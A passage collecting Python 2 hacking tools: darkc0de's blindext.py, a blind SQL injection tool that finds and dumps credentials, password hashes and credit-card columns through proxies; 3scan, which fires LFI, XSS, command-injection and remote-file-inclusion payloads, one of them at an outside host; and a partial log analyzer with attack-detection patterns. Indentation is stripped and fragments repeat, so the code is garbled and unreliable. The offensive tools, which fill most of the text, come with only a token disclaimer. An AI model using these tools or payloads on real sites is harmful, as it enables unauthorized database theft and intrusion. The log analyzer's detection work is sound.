proxy_num+=1
gets+=1
column_URL = fuzz_COLUMN_url.replace("COLUMN",column)
source = proxy_list[proxy_num % proxy_len].open(column_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "[Column]:",column
file.write("\n[Column]:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n[%s] EndTime" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[%s] EndTime" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
sys.exit(1)
#lets count how many rows before we begin
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
if mode != "--info":
row_value = GuessValue(count_URL)
print "[+] Number of Rows: ",row_value,"\n"
file.write("\n[+] Number of Rows: "+str(row_value)+"\n")
else:
row_value = 1
#print line_URL
#print Count_URL
#Primary Loop
lower_bound = 0
upper_bound = 127
for data_row in range(int(lim_num), row_value):
sys.stdout.write("[%s]: " % (lim_num))
file.write("\n[%s]: " % (lim_num))
sys.stdout.flush()
value = chr(upper_bound)
while value != chr(0):
try:
if mode != "--info":
Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
#print Guess_URL
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
else:
Guess_URL = line_URL + str(let_pos)+",1))"
#print Guess_URL
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print
lim_num = int(lim_num) + 1
let_pos = 1
data_row+=1
#Lets wrap it up!
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] %s" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
# Features!
# 1.MySQL Blind Injection Data Extractor
# 2.MySQL Blind Information_schema Database Enumerator
# 3.MySQL Blind Table and Column Fuzzer
# Feel free to do whatever you want with this code!
# Share the c0de!
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx
# and the rest of the Darkc0de members
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# BE WARNED, THIS TOOL IS VERY LOUD..
# Change Log
# 2.9 - added info mode, bug fix in the GuessValue function
# 3.0 - added row option.. now you can tell the app where to begin - remember limit start at 0 not 1
#Fill in the tables you want tested here.
fuzz_tables = ["user","users","username","usernames","mysql.user","orders","order_items","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","account","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
#Fill in the columns you want tested here.
fuzz_columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber","order_payment","card_number","is_admin","cc_number","ccnum","cc_num","credit_card_number","cvc_code","billing_first_name","cvv","cvv2","firstname","lastname","fname","lname","first","last"]
import urllib, sys, re, os, socket, httplib, urllib2, time
#the guts and glory - Binary Algorithim that does all the guessing
def GuessValue(URL):
global gets
global proxy_num
lower = lower_bound
upper = upper_bound
while lower < upper:
try:
mid = (lower + upper) / 2
head_URL = URL + ">"+str(mid)
#print head_URL
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_bound and lower < upper_bound:
value = lower
else:
head_URL = URL + "="+str(lower)
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
value = lower
else:
value = 63
print "Could not find the ascii character! There must be a problem.."
print "Check to make sure your using the app right!"
print "READ xprog's blind sql tutorial!\n"
sys.exit(1)
return value
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|---------------------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v3.0 |"
print "| 7/2008 blindext.py |"
print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
print "| -Blind MySQL v4+ Data Extractor |"
print "| -Blind MySQL v4+ Table & Column Fuzzer |"
print "| Usage: blindext.py [options] |"
print "| -h help darkc0de.com |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
#define varablies
site = ""
string = ""
dbt = "blindextlog.txt"
proxy = "None"
count = 0
mode = "None"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_dump = "None"
arg_schema = "None"
arg_dbs = "None"
arg_mysqldb = ""
darkc0de = ""
line_URL = ""
lower_bound = 0
upper_bound = 10000
gets = 0
mid =0
let_pos = 1
lim_num = 0
value = ""
#help option
for arg in sys.argv:
if arg == "-h":
print "\n Usage: ./blindext.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --fuzz Fuzz Tables and Columns."
print "\tDefine: --info Prints server version, username@location, database name."
print "\n\tRequired:"
print "\tDefine: -u \"www.site.com/news.php?id=234\""
print "\tDefine: -s \"truetextinpage\""
print "\n\tModes dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -r row to begin extracting info at."
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default:blindextlog.txt"
print "\n Ex: ./blindext.py --dbs -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -o output.txt"
print " Ex: ./blindext.py --fuzz -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -p 127.0.0.1:8080"
print " Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog"
print " Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog -T orders -p proxy.txt"
print " Ex: ./blindext.py --dump -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D newjoom -T jos_users -C username,password"
sys.exit(1)
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-s":
string = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-r":
lim_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|---------------------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v3.0 |"
print "| 7/2008 blindext.py |"
print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
print "| -Blind MySQL v4+ Data Extractor |"
print "| -Blind MySQL v4+ Table & Column Fuzzer |"
print "| Usage: blindext.py [options] |"
print "| -h help darkc0de.com |"
print "|---------------------------------------------------------------|"
file.write("\n\n|---------------------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v3.0 |")
file.write("\n| 7/2008 blindext.py |")
file.write("\n| -Blind MySQL v5+ Information_schema Database Enumeration |")
file.write("\n| -Blind MySQL v4+ Data Extractor |")
file.write("\n| -Blind MySQL v4+ Table & Column Fuzzer |")
file.write("\n| Usage: blindext.py [options] |")
file.write("\n| -h help darkc0de.com |")
file.write("\n|---------------------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and -s flag."
print "[-] For help -h\n"
sys.exit(1)
if string == "":
print "\n[-] Must include -s flag followed by \"truetextinpage\" string."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --schema --dbs --dump --fuzz"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
#Build proxy list
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site+"\n")
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
file.write("\n[-] All proxies have failed. App Exiting\n")
sys.exit(1)
print "[+] Proxy List Complete"
file.write("[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener())
#Gather Server Config
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...")
proxy_num = 0
proxy_len = len(proxy_list)
ser_ver = 3
while 1:
try:
config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(config_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!"
file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
if int(ser_ver) <= 4 and mode == "--schema":
print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
if int(ser_ver) <= 4 and mode == "--dbs":
print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
break
if int(ser_ver) >= 6:
print "\t[-] Not a MySQL server or the string your using is not being found!"
file.write("\n\t[-] Not a MySQL server or the string your using is not being found!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
ser_ver+=1
gets+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Build URLS
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables from database \""+arg_database+"\""
file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
count_URL = site+"+and+((SELECT+COUNT(table_name)"
count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+table_name"
line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
count_URL = site+"+and+((SELECT+COUNT(column_name)"
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
count_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+column_name"
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
line_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
darkc0de += column+",0x3a,"
darkc0de = darkc0de.rstrip("0x3a,")
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"
count_URL = count_URL+""+arg_database+"."+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"
line_URL = line_URL+""+arg_database+"."+arg_table
if ser_ver == 4:
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_table
if arg_database == "mysql" or arg_database == "MYSQL" or arg_database == "MySQL":
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+mysql."+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+mysql."+arg_table
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site+"+and+((SELECT+COUNT(schema_name)"
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+schema_name"
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
line_URL += "+LIMIT+"
if mode == "--info":
print "[+] Showing database version, username@location, and database name!"
file.write("\n[+] Showing database version, username@location, and database name!")
count_URL = "Nothing"
line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
#Lets Fuzz
if mode == "--fuzz":
print "\n[%s] StartTime" % time.strftime("%X")
file.write("\n\n[%s] StartTime" % time.strftime("%X"))
print "[+] Fuzzing Tables..."
file.write("\n[+] Fuzzing Tables...")
fuzz_TABLE_url = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
for table in fuzz_tables:
try:
proxy_num+=1
gets+=1
table_URL = fuzz_TABLE_url.replace("TABLE",table)
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "\n[Table]:",table
file.write("\n\n[Table]:"+table)
fuzz_COLUMN_url = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
column_URL = fuzz_COLUMN_url.replace("COLUMN",column)
source = proxy_list[proxy_num % proxy_len].open(column_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "[Column]:",column
file.write("\n[Column]:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n[%s] EndTime" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[%s] EndTime" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
sys.exit(1)
#lets count how many rows before we begin
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
if mode != "--info":
row_value = GuessValue(count_URL)
print "[+] Number of Rows: ",row_value,"\n"
file.write("\n[+] Number of Rows: "+str(row_value)+"\n")
else:
row_value = 1
#print line_URL
#print Count_URL
#Primary Loop
lower_bound = 0
upper_bound = 127
for data_row in range(int(lim_num), row_value):
sys.stdout.write("[%s]: " % (lim_num))
file.write("\n[%s]: " % (lim_num))
sys.stdout.flush()
value = chr(upper_bound)
while value != chr(0):
try:
if mode != "--info":
Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
#print Guess_URL
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
else:
Guess_URL = line_URL + str(let_pos)+",1))"
#print Guess_URL
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
lim_num = int(lim_num) + 1
let_pos = 1
data_row+=1
#Lets wrap it up!
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] %s" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
3scan ( lfi-xss-rfi-cmd)
[code]
#!/usr/bin/python
#Checks LFI,XSS,RFI,CMD injection searches source and http response (simple)
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, httplib, urllib2, re
#Don't change LFI,XSS, or CMD
LFI = "../../../../../../../../../../../../etc/passwd"
RFI = "http://yozurino.com/r.txt?"
RFI_TITLE = "Target"
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
CMD = "|id|"
def main(host):
host = host.replace("http://","")
if host[-1:] != "=":
print "\n[-] Host should end with a \'=\'\n"
print "[-]",host
sys.exit(1)
print "\n[+] Host:",host
try:
print "\n[+] Checking XSS"
xss(host)
print "\n[+] Checking LFI"
lfi(host)
print "\n[+] Checking RFI"
rfi(host)
print "\n[+] Checking CMD"
cmd(host)
except(urllib2.HTTPError, urllib2.URLError), msg:
print "[-] Error Occurred:",msg
pass
def rfi(host):
try:
h = httplib.HTTP(host.rsplit("/")[0])
h.putrequest("GET","/"+host.rsplit("/")[1]+RFI)
h.putheader("Host", host.rsplit("/")[0])
h.endheaders()
status, reason, headers = h.getreply()
source = urllib2.urlopen("http://"+host+RFI).read()
if re.search("Target", source) and status == 200:
print "[+] RFI:",host+RFI,"\n[+]",status, reason
else:
print "[-] Not Vuln."
except(),msg:
#print "[-] Error Occurred",msg
pass
def xss(host):
source = urllib2.urlopen("http://"+host+XSS).read()
if re.search("XSS", source) != None:
print "[!] XSS:",host+XSS
else:
print "[-] Not Vuln."
def cmd(host):
source = urllib2.urlopen("http://"+host+CMD).read()
if re.search("uid=", source) != None:
print "[!] CMD:",host+CMD
else:
print "[-] Not Vuln."
def lfi(host):
source = urllib2.urlopen("http://"+host+LFI).read()
if re.search("root:", source) != None:
print "[!] LFI:",host+LFI
else:
print "[-] Not Vuln."
source = urllib2.urlopen("http://"+host+LFI+"").read()
if re.search("root:", source) != None:
print "[!] LFI:",host+LFI+""
else:
print "[-] Not Vuln. w/ Null Byte"
if len(sys.argv) != 3:
print "\nUsage: ./3scan.py "
print "ex: ./3scan.py -s www.example.com/index.php?page="
print "ex: ./3scan.py -list /home/d3hydr8/sites.txt"
print "\t[options]"
print "\t -s/-site : Searches just that site"
print "\t -l/-list : Searches list"
sys.exit(1)
print "\n d3hydr8[at]gmail[dot]com 3scan v1.0"
print "---------------------------------------"
if sys.argv[1].lower() == "-l" or sys.argv[1].lower() == "-list"{ :
}
try:
sites = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your file path\n"
sys.exit(1)
for host in sites:
main(host.replace("\n",""))
else:
main(sys.argv[2])
print "\n[+] Done\n"
[/code]
Log File Analyser
#!/usr/bin/python
# Simple Log File Analyzer by Valentin Hoebel
# Version 1.0 (6th June 2010)
# Contact me at valentin@xenuser.org
# Website: I am sure you will find me! :)
# ASCII FOR BREAKFAST
# Description:
# This tool helps you to find hack attempts
# within webserver log files (e.g. Apache2 access logs).
# Features:
# - Error handling
# - Scan a log file for four different attack types
# - Display a short scan report
# - Write scan results to a new log file
# - Easy to use (everything is simple and automated
# Usage example:
# scan_log.py -file vhost_access.log
# Known issue:
# XSS attempt discovery feature can be a little bit buggy.
# Tested with:
# Apache2 log files only. Sry guys! But I am sure
# that every other webserver log file will work aswell.
# Disclaimer:
# I am not responsible if this script or you cause any damage
# to your system. The memory consumption can become
# quite large and the generated reports very huge. So be sure
# you know what you are doing. I highly recommend you
# download your log files on a separate machine and
# analyze these files there.
# I know that there are much better tools, but well, I do
# this for learning and fun =)
# Attention: Tool is far away from being perfect, so don't rely a 100 percent on it.
# A BIG "Thank you!" to all who publish their awesome Python
# scripts online and help other ppl learning this language.
# Modify, distribute, share and copy this code in any way you like!
# Power to the cows!
import sys, string, re, time
from time import strftime, localtime
def print_usage():
print ""
print ""
print "________________________________________________"
print "Simple Log File Analyzer"
print "by Valentin Hoebel (valentin@xenuser.org)"
print ""
print "Version 1.0 (6th June 2010) ^__^"
print " (oo)\________"
print " (__)\ )\/\ "
print " ||----w |"
print "Power to teh cows! || ||"
print "________________________________________________"
print ""
print "[!] Use parameter --help for help!"
print ""
print ""
return
def print_help():
print ""
print ""
print "________________________________________________"
print "Simple Log File Analyzer"
print "by Valentin Hoebel (valentin@xenuser.org)"
print ""
print "Version 1.0 (6th June 2010) ^__^"
print " (oo)\________"
print " (__)\ )\/\ "
print " ||----w |"
print "Power to teh cows! || ||"
print "________________________________________________"
print ""
print "The Simple Log File Analyzer helps you to find"
print "common hack attempts within your webserver log."
print ""
print "Supported attacks:"
print " - SQL Injection"
print " - Local File Inclusion"
print " - Remote File Inclusion"
print " - Cross-Site Scripting"
print ""
print "This scanner doesn't find everything so don't"
print "rely on it!"
print ""
print "Usage example:"
print "scan_log.py -file vhost_access.log"
print ""
print "Options:"
print " -file (starts the main analyzing function"
print " --help (displays this text)"
print ""
print "Features:"
print " - Error handling"
print " - Scan a log file for four different attack types"
print " - Display a short scan report"
print " - Write scan results to a new log file"
print " - Easy to use (everything is simple and automated)"
print ""
print "Additional information:"
print "I only tested this tool with Apache2 log files (up to 2000 lines)."
print "It may happen that the tool crashes when the provided log"
print "file is too big or contains too many lines/characters."
print "Scanning a 4000 lines log file only takes one second."
print ""
print "Hint: The XSS discovery feature is a little bit buggy."
print ""
print ""
return
def print_banner():
print ""
print ""
print "________________________________________________"
print "Simple Log File Analyzer"
print "by Valentin Hoebel (valentin@xenuser.org)"
print ""
print "Version 1.0 (6th June 2010) ^__^"
print " (oo)\________"
print " (__)\ )\/\ "
print " ||----w |"
print "Power to teh cows! || ||"
print "________________________________________________"
return
# Define the function for analyzing log files def analyze_log_file(provided_file):
# Defining some important vars
sqli_found_list = {}
lfi_found_list = {}
rfi_found_list = {}
xss_found_list = {}
# I know, there are better methods for doing/defining this...
sql_injection_1 = "UNION"
sql_injection_2 = "ORDER"
sql_injection_3 = "GROUP"
local_file_inclusion_1 = "/etc/passwd"
local_file_inclusion_2 = "/etc/passwd%20"
local_file_inclusion_3 = "=../"
remote_file_inclusion_1 = "c99"
remote_file_inclusion_2 = "=http://"
cross_site_scripting_1 = "XSS"
cross_site_scripting_2 = "alert"
cross_site_scripting_3 = "String.fromCharCode"
cross_site_scripting_4 = "iframe"
cross_site_scripting_5 = "javascript"
print "[i] >>", provided_file
print "[i] Assuming you provided a readable log file."
print "[i] Trying to open the log file now."
print ""
# Opening the log file
try:
f = open(provided_file, "r")
except IOError:
print "[!] The file doesn't exist."
print "[!] Exiting now!"
print ""
sys.exit(1)
print "[i] Opening the log file was successfull."
print "[i] Moving on now..."
print ""
# Storing every single line in a list
line_list = [line for line in f]
max_lines = len(line_list)
print "[i] The file contains", max_lines, "lines."
print "[i] Now looking for possible hack attempts..."
# Viewing every single line
for x in xrange(1, max_lines):
current_line = line_list[x:x+1]
# For some strange list behaviour we convert the list into a string
current_line_string = "".join(current_line)
# Search for SQL injections
find_sql_injection_1 = re.findall(sql_injection_1, current_line_string)
if len(find_sql_injection_1) != 0:
sqli_found_list[x+1] = current_line_string
else:
find_sql_injection_2 = re.findall(sql_injection_2, current_line_string)
if len(find_sql_injection_2) != 0:
sqli_found_list[x+1] = current_line_string
else:
find_sql_injection_3 = re.findall(sql_injection_3, current_line_string)
if len(find_sql_injection_3) != 0:
sqli_found_list[x+1] = current_line_string
# Search for local file inclusions
find_local_file_inclusion_1 = re.findall(local_file_inclusion_1, current_line_string)
if len(find_local_file_inclusion_1) != 0:
lfi_found_list[x+1] = current_line_string
else:
find_local_file_inclusion_2 = re.findall(local_file_inclusion_2, current_line_string)
if len(find_local_file_inclusion_2) != 0:
lfi_found_list[x+1] = current_line_string
else:
find_local_file_inclusion_3 = re.findall(local_file_inclusion_3, current_line_string)
if len(find_local_file_inclusion_3) != 0:
lfi_found_list[x+1] = current_line_string
# Search for remote file inclusions
find_remote_file_inclusion_1 = re.findall(remote_file_inclusion_1, current_line_string)
if len(find_remote_file_inclusion_1) != 0:
rfi_found_list[x+1] = current_line_string
else:
find_remote_file_inclusion_2 = re.findall(remote_file_inclusion_2, current_line_string)
if len(find_remote_file_inclusion_2) != 0:
rfi_found_list[x+1] = current_line_string
# Search for cross-site scripting attempts
find_cross_site_scripting_1 = re.findall(cross_site_scripting_1, current_line_string)
if len(find_cross_site_scripting_1) != 0:
xss_found_list[x+1] = current_line_string
else:
find_cross_site_scripting_2 = re.findall(cross_site_scripting_2, current_line_string)
if len(find_cross_site_scripting_2) != 0:
xss_found_list[x+1] = current_line_string
else:
find_cross_site_scripting_3 = re.findall(cross_site_scripting_3, current_line_string)
if len(find_cross_site_scripting_3) != 0:
xss_found_list[x+1] = current_line_string
else:
find_cross_site_scripting_4= re.findall(cross_site_scripting_4, current_line_string)
if len(find_cross_site_scripting_4) != 0:
xss_found_list[x+1] = current_line_string
else:
find_cross_site_scripting_5 = re.findall(cross_site_scripting_5, current_line_string)
if len(find_cross_site_scripting_5) != 0:
xss_found_list[x+1] = current_line_string
# Close the file we opened recently
f.close()
# Generating a short report
print "[i] Done."
print ""
print "[#] Simple report for analyzed log file"
check_for_sqli_attempts = len(sqli_found_list)
if check_for_sqli_attempts > 0:
print "[!]", check_for_sqli_attempts, "SQL injection attempt(s) was/were found."
else:
print "[+] No SQL injection attempt was found."
check_for_lfi_attempts = len(lfi_found_list)
if check_for_lfi_attempts > 0:
print "[!]", check_for_lfi_attempts, "local file inclusion attempt(s) was/were found."
else:
print "[+] No local file inclusion attempt was found."
check_for_rfi_attempts = len(rfi_found_list)
if check_for_rfi_attempts > 0:
print "[!]", check_for_rfi_attempts, "remote file inclusion attempt(s) was/were found."
else:
print "[+] No remote file inclusion attempt was found."
check_for_xss_attempts = len(xss_found_list)
if check_for_xss_attempts > 0:
print "[!]", check_for_xss_attempts, "cross-site scripting attempt(s) was/were found."
else:
print "[+] No crosse-site scripting attempt was found."
# Now generate the report
print ""
print "[i] Generating report..."
# Define variables for the report name
time_string = strftime("%a_%d_%b_%Y_%H_%M_%S", localtime())
time_string_for_report = strftime("%a the %d %b %Y, %H:%M:%S", localtime())
name_of_report_file = provided_file + "_scan_report_from_" + time_string
# Convert the ints to strings
sqli_numbers = str(check_for_sqli_attempts)
lfi_numbers = str(check_for_lfi_attempts)
rfi_numbers = str(check_for_rfi_attempts)
xss_numbers = str(check_for_xss_attempts)
# Create the file
generated_report = open(name_of_report_file, "w")
# Write the content
generated_report.write("\n")
generated_report.write("Simple Log File Analyzer\n")
generated_report.write("by Valentin Hoebel (valentin@xenuser.org)\n")
generated_report.write("\n")
generated_report.write("Version 1.0 (6th June 2010) ^__^\n")
generated_report.write(" (oo)\________\n")
generated_report.write(" (__)\ )\/\ \n")
generated_report.write(" ||----w |\n")
generated_report.write("Power to teh cows! || ||\n")
generated_report.write("________________________________________________\n")
generated_report.write("\n")
generated_report.write("Scan report for " +provided_file + " on " + time_string_for_report + "\n")
